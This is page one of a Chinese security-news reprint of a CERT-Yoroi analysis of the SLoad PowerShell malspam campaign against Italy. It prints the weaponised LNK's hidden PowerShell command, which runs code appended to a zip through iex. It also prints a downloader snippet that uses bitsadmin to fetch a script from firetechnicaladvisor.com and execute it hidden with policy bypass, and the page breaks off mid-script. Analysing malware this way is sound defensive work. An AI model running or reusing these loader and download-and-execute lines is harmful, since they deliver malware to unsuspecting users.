安全黑客
当前位置:安全黑客文章资讯安全资讯安全新闻
日期:2018-12-03 23:12:00  来源:本站整理

SLoad Powershell malspam正在蔓延到意大利[安全新闻]

赞助商链接



  本文“SLoad Powershell malspam正在蔓延到意大利[安全新闻]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

一、介绍
在过去的几个月里,CERT-Yoroi观察到一种新兴攻击模式。一系列恶意电子邮件共享通用技术,这些技术可能与一个威胁组织对意大利网络全面的攻击有关。目前尚不清楚这些攻击尝试是由一个完善的网络犯罪组织修改其TTP所致,还是全新的攻击尝试。但CERT-Yoroi正在通过内部代号“Sload-ITA”(TH-163)来跟踪此威胁。去年五月,SANS ICS研究人员在英国也记录了类似的操作行为。恶意行动通过滥用基于压缩存档中的代码隐藏技术和类似的drop-url模式共享相同的drop mode:
· 2018-10-08 – 使用“/AE-9455933DGW-nota-cliente” url 模式
· 2018-10-09 – 使用“/fattura-per-cliente-QN-OAYSAPV” url 模式
· 2018-10-15 –使用“/MA-47462780Y3-documento-cliente” url 模式
· 某些恶意邮件已从“PEC”邮箱发送
· 2018-11-19 – 使用 “/documento-aggiornato-novembre-ER16909FP9”
·  CERT-PA 追踪
Yoroi-Cybaze ZLAB收集并解析了在响应操作期间恢复的样本,用来揭示这些攻击者使用的恶意植入程序的细节。下图总结了sLoad恶意软件感染的步骤。

图1. SLoad感染流程
二、技术分析
分析的恶意样本是压缩zip存档,包含两个不同文件
1. 一个假装指向系统文件夹的链接,名为“invio fattura elettronica.lnk”
2. 一个隐藏的JPEG图像“image _20181119_100714_40.jpg”,该文件存储为HA属性。
尽管从存档中提取的LNK文件表面上看很无辜,但它的武器化方式与APT29在其最新操作期间采用的方式类似,表明该技术是几种恶意网络武器的一部分。实际上,当用户双击文件时,批处理脚本会生成下面的powershell脚本:
C:\Windows\System32\cmd.exe /C powershell.exe -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$g3u=get-content -LiteralPat $9oc.fullname;$g3u[$g3u.length-1]|iex}"
PS脚本搜索与模式“documento-aggiornato-novembre – * .zip”匹配的任何文件:如果文件存在,则脚本在其末尾提取一部分代码,然后通过“IEX”调用它;我们检查了zip文件并恢复了这部分代码。在下图中,可以看到附件存档内容分为粉红色和黄色,外来代码为蓝色。

图2.添加到Zip存档的代码
该部分文件包含powershell脚本调用的可执行代码。由于调用了“bitsadmin.exe”,此代码能够从“firetechnicaladvisor.com”下载其他脚本,然后将所有这些新下载的文件存储在“%APPDATA%/ ”文件夹中。下图显示了下载恶意植入程序后文件夹的内容:

图3.恶意植入程序的组件
下面的片段显示了负责下载这些恶意软件的代码。
$env_appData=$env:appdata;
$cmd='cmd';
$gen_random_value_name_ps= -join ((65..90) + (97..122) | Get-Random -count 14 | % {[char]$_});
$get_uuid=(Get-WmiObject Win32_computerSystemProduct).UUid;
$set_hidden='hidden';
$folder_to_store_file = $env_appData+'\'+$get_uuid;
$h=$folder_to_store_file+'\d'; 
   if(!(test-path $folder_to_store_file)){
   New-item -itemtype directory -Force -path $folder_to_store_file;
   };
$ps_to_download_and_execute='/c echo 1 > '+$h+'  & bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & del '+$h+' & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
$e=1;
Start-Sleep -s 6;
$p2='powe';
while($e -eq 1){
   if(test-path $h)
   Start-Sleep -s 3
   }else{
   $e=2
   }
};
Start-Sleep -s 7;
$p1='ell';
$ps_to_download_and_execute='/c '+$p2+'rsh'+$p1+' -nop -ep bypass -File '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
NxPgKLnYEhMjXT.ps1脚本安装并植入受害者的机器,在系统上注册计划任务,以确保感染持续存在。然后,该脚本会自删除。

图4.恶意植入程序的安装脚本
在快速查看CxeLtfwc.ps1脚本之后,我们还注意到恶意软件使用cmdlet“Invoke-Expression”从“config.ini”文件加载并运行另一段代码。
param ([string]$k = "");
$random_name_of_powershell=Get-Process -name powershell*;
if ($random_name_of_powershell.length -lt 2){
   $folder_name = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
   $log = $env:APPDATA+"\"+$folder_name;

[1] [2] [3] [4] [5] [6]  下一页


  以上是“SLoad Powershell malspam正在蔓延到意大利[安全新闻]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • SLoad Powershell malspam正在蔓延到意大利
  • 甲骨文的Java未签名的Applet Applet2ClassLoader远程代码执行漏洞
  • Java的ClassLoader与Package机制
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .